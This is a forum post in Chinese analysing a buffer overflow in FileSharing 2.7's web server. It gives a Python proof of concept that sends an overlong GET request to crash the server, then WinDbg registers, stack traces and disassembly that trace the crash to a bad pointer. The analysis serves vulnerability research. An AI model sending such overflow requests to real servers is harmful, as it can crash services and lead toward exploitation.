前段时间公布了fileshareing2.7的漏洞溢出程序，实验了下，确实可以用，我也尝试分析了以下漏洞成因，定位了溢出点，过程分享如下：

1、构建一个触发程序,用调试器启动测试程序，触发漏洞
     根据metasploit给出的溢出验证程序，编写了一小段python代码用来测试。

import socket
def pocfileshare():
    ss=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
    ss.connect(("127.0.0.1",80))
    s_data="GET "
    s_data+='a'*4073
    s_data+=" HTTP/1.0\r\n\r\n"
    ss.send(s_data.encode())
    aa=ss.recv(1000)
    print(aa)
    ss.close()
pocfileshare()

0:004:x86> k
 # ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00 037d6fbf 0042002f fsws+0x1227dd
01 037d75fc 00000000 fsws+0x2002f
0:004:x86> r
eax=7d721800 ebx=00000f07 ecx=61616161 edx=18b99803 esi=037d7200 edi=ffffffff
eip=005227dd esp=037d6fab ebp=037d6fbf iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
fsws+0x1227dd:
005227dd 8b31            mov     esi,dword ptr [ecx]  ds:002b:61616161=????????

.text:005227BB ; int __stdcall sub_5227BB(int, int, size_t)
.text:005227BB sub_5227BB      proc near               ; CODE XREF: sub_401FD0+70p
.text:005227BB                                         ; .text:004023F5p ...
.text:005227BB
.text:005227BB var_10          = dword ptr -10h
.text:005227BB var_C           = dword ptr -0Ch
.text:005227BB var_4           = dword ptr -4
.text:005227BB arg_0           = dword ptr  8
.text:005227BB arg_4           = dword ptr  0Ch
.text:005227BB arg_8           = dword ptr  10h
.text:005227BB
.text:005227BB                 mov     eax, offset loc_56205B
.text:005227C0                 call    __EH_prolog
.text:005227C5                 push    ecx
.text:005227C6                 mov     edx, [ebp+arg_4]
.text:005227C9                 and     [ebp+var_10], 0
.text:005227CD                 test    edx, edx
.text:005227CF                 jge     short loc_5227D3
.text:005227D1                 xor     edx, edx
.text:005227D3
.text:005227D3 loc_5227D3:                             ; CODE XREF: sub_5227BB+14j
.text:005227D3                 mov     eax, [ebp+arg_8]
.text:005227D6                 test    eax, eax
.text:005227D8                 jge     short loc_5227DC
.text:005227DA                 xor     eax, eax
.text:005227DC
.text:005227DC loc_5227DC:                             ; CODE XREF: sub_5227BB+1Dj
.text:005227DC                 push    esi
.text:005227DD                 mov     esi, [ecx]      ; 出错的位置：ecx=0x61616161,从程序中可以看出，到目前为止，这个函数本身并没有改变ecx，因此，应该是在调用这个函数之前传递过来的时候就已经出问题了，那么是在什么地方出的问题呢？
.text:005227DF                 push    edi
.text:005227E0                 lea     edi, [edx+eax]
.text:005227E3                 mov     esi, [esi-8]
.text:005227E6                 cmp     edi, esi
.text:005227E8                 jle     short loc_5227EE
.text:005227EA                 mov     eax, esi
.text:005227EC                 sub     eax, edx

0:008:x86> k
 # ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00 031d7168 0042ebd0 fsws+0x1227bb
01 031d7218 0042d32e fsws+0x2ebd0  ;很有可能是出问题的代码所在位置
02 031d7524 0040faa0 fsws+0x2d32e  ;八成是他调用的函数出的问题。
断点应该设置为：fsws+0x2d329
03 031eff50 004f9a46 fsws+0xfaa0
04 031eff88 7673338a fsws+0xf9a46
05 031eff94 77929902 kernel32!BaseThreadInitThunk+0xe
06 031effd4 779298d5 ntdll32!__RtlUserThreadStart+0x70
07 031effec 00000000 ntdll32!_RtlUserThreadStart+0x1b

0:000:x86> g
Breakpoint 0 hit
fsws+0x1227bb:
005227bb b85b205600      mov     eax,offset fsws+0x16205b (0056205b)

0:008:x86> r
eax=00000000 ebx=00000f07 ecx=61616161 edx=009794e0 esi=031d7200 edi=ffffffff
eip=005227bb esp=031d6fc3 ebp=031d75fc iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
fsws+0x1227bb:
005227bb b85b205600      mov     eax,offset fsws+0x16205b (0056205b)

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)